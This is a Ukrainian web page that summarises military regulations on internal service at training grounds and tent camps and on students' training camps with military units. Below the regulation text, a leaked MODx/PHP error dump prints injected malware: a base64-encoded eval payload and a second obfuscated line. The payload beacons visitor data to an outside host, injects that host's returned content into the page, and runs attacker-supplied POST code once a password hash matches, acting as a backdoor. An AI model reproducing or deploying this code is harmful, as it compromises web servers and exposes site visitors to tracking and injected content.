Особливості внутрішньої служби під час розташування військ на полігоні, в таборах.

Український легіон » Дисципліни » Статут ЗСУ » Особливості внутрішньої служби під час розташування військ на полігоні, в таборах.

1. Загальні положення. Правила розташування збору.

Порядок виходу військ на полігон (у табір) встановлюється планом бойової підготовки або наказом старшого командира (начальника).

Командир військової частини, встановлюючи розпорядок дня, порядок звільнення рядового і сержантського складу та інші правила внутрішнього порядку, повинен враховувати завдання підрозділів щодо підвищення польової виучки, особливості їх розташування, а також загальні правила, встановлені на полігоні (в таборі) старшим командиром (начальником).

Під час проведення на полігоні (в таборі) збору військових частин (підрозділів) різних з'єднань (військових частин) для керівництва внутрішньою службою наказом старшого командира (начальника) призначається начальник табірного збору, а у разі потреби — інші посадові особи.

Начальник табірного збору свої обов'язки виконує відповідно до обов'язків командира полку. Крім того, начальник табірного збору зобов'язаний:

організовувати доведення до всіх частин (підрозділів) табірного збору сигналів щодо приведення їх у вищі ступені бойової готовності, забезпечити у разі потреби їх своєчасне відбуття до пунктів дислокації;

організовувати бойову підготовку особового складу підрозділів і військових частин табірного збору;

підтримувати високу військову дисципліну серед особового складу табірного збору і внутрішній порядок;

здійснювати заходи щодо охорони довкілля й пожежної безпеки.

Начальник табірного збору е прямим начальником особового складу всіх військових частин (підрозділів) табірного збору і користується дисциплінарною владою на один ступінь вище своєї штатної посади.

У добовий наряд наказом начальника табірного збору призначається черговий табірного збору, який виконує обов'язки, встановлені для чергового частини.

Військова частина та її підрозділи розташовуються на полігоні в приміщеннях або наметних таборах. Якщо кілька військових частин або підрозділів різних з'єднань (військових частин) об'єднуються в один табір, територія й приміщення між ними розподіляються наказом старшого командира (начальника) або начальника табірного збору.

Штати, медичні пункти, майстерні, склади, служби (об'єкти) тилу розташовують переважно в приміщеннях. Озброєння і військова техніка у польових парках розміщуються у сховищах і під навісами, а у разі їх відсутності закриваються чохлами або брезентом.

Межі полігону (табору), за які особовому складові виходити заборонено, оголошуються в наказі по частині.

Порядок купання особового складу у відкритих водоймах встановлюється командиром військової частини  (начальником табірного    збору).    Військовослужбовці   строкової    служби відправляються на купання строєм під командою старшого.

Для нагляду за порядком під час купання, запобігання нещасним випадкам на воді та подання медичної допомоги призначається черговий купальні, черговий команди плавців і черговий фельдшер (санітарний інструктор).

Під час купання командири підрозділів (старші команд) зобов'язані наглядати за тими, хто купається.

Територія полігону (табору) має утримуватися в чистоті, з додержанням вимог пожежної безпеки (додаток 19 до цього Статуту) та охорони довкілля. Сміття збирається і щоденно вивозиться у місця, погоджені з органами санітарного нагляду і віддалені від меж роз­ташування військової частини не менше ніж на 3 км, з урахуванням напрямку вітру.

Дороги на території полігону (табору) утримуються у придатному для проїзду стані та обладнуються покажчиками. Для гусеничної техніки встановлюються окремі маршрути руху, погоджені з органами виконавчої влади та місцевого самоврядування. Рух не зазначеними амршрутами заборонено.

 

 2. Розташування військової частини табором (у наметах). Виклик чергових на лінію.

У разі проведення загальної полкової (табірної) вечірньої перевірки керуються положеннями статті 209  Статуту.

За сприятливої погоди вдень і в теплі ночі за розпорядженням чергового частини (табірного збору) днювальні піднімають поли наметів. За сухої погоди табірні лінійки, дороги і доріжки між наметами поливаються водою.

Чергові викликаються на лінію, коли до табору прибуває Президент України, Голова Верховної Ради України, Прем'єр-міністр України, Міністр оборони України, його заступники, всі прямі начальники від командира військової частини і вище, а також особи., призначені для керівництва проведенням інспектування (перевірки).

Чергові викликаються на лінію за наказом чергового частини (табірного збору).

Чергові на лінію викликаються через днювальних на лінійці, які передають команду «Чергові, на лінію» або «Черговий першої роти, на лінію».

Після сигналу «Відбій» до сигналу «Підйом» команда для виклику чергових на лінію не подається.

Під час виклику чергових на лінію вони стають обличчям до поля:

чергові рот, крім лівофлангових, розміщуються на правих флангах за крок перед черговим днювальним, черговий лівофлангової роти батальйону - на лівому фланзі;

черговий частини (табірного збору) — навпроти пра-порової сошки, за три кроки перед нею; його помічник — за крок позаду нього;

черговий сигналіст-барабанщик — за крок позаду помічника чергового частини (табірного збору), на лінії чергових рот.

Для зустрічі осіб, зазначених у статгі 374 цього Статуту, черговий частини (табірного збору) виходить на той фланг військової частини, звідки очікується при буття; з прибуттям зазначених осіб він доповідає і супроводжує прибулих

Якщо прибулого командира (начальника) зустрічав і доповідає йому командир військової частини, черговий частини (табірного збору) лише відрекомендовується»

  

3. Учбові збори та стажування у військових частинах

Учбові збори та стажування курсантів(студентів) у військовій частині є заключний етап військової підготовки. Вони проводяться в канікулярний час з метою практичного навчання в військових умовах, в яких вдосконалюються командні та методичні навики студентів, отримані ними при вивченні курсу військової підготовки в навчальному закладі, виконуються інші навчально-бойові завдання , вправи стрільби.

На учбові збори направляються курсанти - чоловіки, які пройшли пс вний курс військової підготовки в інституті та які склали встановлені заліки та іспити.

Призов та направлення курсантів на учбові збори та стажування вдійснюсться   військоматами   за   списками   підготовленними факультетом військової підготовки. Курсанти, які захворіли, йдуть на обстеження в військомати (про всіх курсантів, які не прибули на учбові збори, начальник факультету військової підготовки доповідає в першій день зборів витгому керівництву з указанням причин);

Розміщення, - в казармі або в таборі відповідно до Статуту внутрішньої служби (про це мова йшла у 1-му та 2-му питаннях), їм видаються відповідні знаки розпізнання, також і за званням. В перший день зборів за кожним курсантом закріплюється зброя,   засоби індивідуального захисту та інші речі екіпірування.

Курсанти під час учбових зборів залучаються до несення служби добового наряду. Кожний учбовий взвод один раз за період збору призначається в повному складі на варту, де курсанти виконують обов'язки розвідного та вартових. За практичне несення служби (внутрішньої та варти) курсантам виставляються оцінки в журнал обліку занять.

Курсантам, призначенним на посаду заступника командира взводу, командира відділення наказом командира військової частини можуть пписвоїти сеожантські звання.

Залучати курсантів на господарчі та інші роботи, не пов'язані а забезпеченням навчального процесу та їх побутового влатгування в період проходження учбових зборів, категорично забороняється.

В період проходження учбових зборів на курсантів поширюються всі права та обов'язки Закону "Про загальний військовий обов'язок" відповідно військовозобов'язаних,    призваних на учбові збори. Курсанти називаються курсантами, а хто має звання - відповідно з іванням.

Курсанти, які систематично порушують дисципліну під час проходжень ня учбових зборів, з  подачі начальника факультету військової підготовки наказами ректора відраховуються з інституту за недисциплінованість. З отриманням рішення ректора відчислені курсанти командирами військових частин слідують установленим порядком в навчальний заклад для оформлення відрахування.

Рішенням ректора звільняються з військової підготовки також курсанти, які ухиляються від проходження учбових зборів або які не склали в певний строк перецбачені програмою військової підготовки заліки та іспити про що письмово повідомляється в вїйськомат по місцю перебування курсанта на обліку.

З'єднанням (частиною) видається наказ про організацію учбових зборів, розробляється план-графік проходження программ учбових збо­рів, план-календар основних заходів, здійснюваних з курсантами, план МТЗ, план спортивно-масових заходів, розклад занять та інших необ­хідних документів;

Факультетом військової підготовки при підготовці до проведення учбових зборів курсантів розробляється :

- проект плану-графіку проходження програми учбових зборів та необхідна учбово-методична документація, яка уточнюється по при­бутті до військової частини;

- замовлення в довольчі органи в/ч   на озброєння, техніку, боєприпаси,    моторесурси,    обмундирування,    споряітження, продовольчо-путьові  гроші  та  документацію  для  організації внутрішньої служби.

Замовлення висипаються в в/ч за 40 днів до початку зборів. Окрім того, готується література на навчальні посібники, необхідні для забезпечення навчального процесу на зборах.

Навчальний час на ЗО -денному учбовому зборі:

- 24 дні на  бойову та  політичну  підготовку та складення випускного іспиту (якщо за програмою він проводиться в військовій частині);

- один день на влаштування та організацію внутрішньої служби після прибуття до частини;

- один день на обслуговування та здачу озброєння, техніки та майна;

- тривалість навчального тижня на учбових зборах встановляється 6 днів; навчального дня - 6 годин занять та 2 години самостійної  підготовки, в передвихідні дні - 6 гоцин занять без проведення самостійної підготовки.

При проведенні тактичних (тактико-спеціальних) та спеціальних навчань, бойової роботи, бойових стрільб, занять з проведення регламентних робіт, водінні бойових машин, тривалість навчального дня - не регламентується.

Проведення із  курсантами парково-господарського дня під час учбових зборів не передбачено.

Під час учбового сбору за наказом командира в/ч проводиться тактико -стройове заняття,  стройовий огляд та підйом особового складу за сигналом "Збір" з проведенням 15-кілометрового маршу в пішому порядку, змагання по виконанню нормативів.

Про прийняття курсантами військової присяги робиться запис в посвідченні про пропис до призовної цільницї (приписне свідоцтво) та на особистій карточці курсанта.

Копії списків про прийняття військової присяги курсантами в військовій частині висипаються на факультет військової підготовки інституту.

Викладацький склад від ФВП НАУ виділяється на увесь період учбових зборів.

Йому доручається:

- організація та проведення занять   з тактичної, спеціальної, технічної, вогневої підготовки , а також консультацій та самостійної підготовки;

- проведення інструкторсько-методичних занять;

- перевірка несення служби;

- організація спортивно-масової роботи ;

-проведення випускних іспитів.

Їх права викладені в Дисциплінарному Статуті.

Офіцери ФВП, які відбувають на учбові збори з групою курсантів, відповідають за якість виконання ними програми та стан дисципліни цієї групи.

Після закінчення учбового збору командири рот та взводів за участю викладачів    ФВП складають на кожного курсанта службову характеристику, в якій відображають:

- політичні, моральні, ділові, командирські та методичні якості;

- загальний рівень розвитку;

- відно'дення до навчання ;

- знання зброї та бойової техніки, статутів та порадників;

- особливості характеру і

- участь в громадській роботі;

- фізична підготовайнність;

-  результат випускного іспиту та інші дані. У висновках зазначити, чи гідний курсант присвоєння йому військового звання офіцера запасу по ВОС. Характеристики підписуються начальником учбового збору, затверджується печаткою військової частини та надсилаються в університет.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0126 s(22 Requests)
  PHP: 0,3293 s 
  Total: 0,3419 s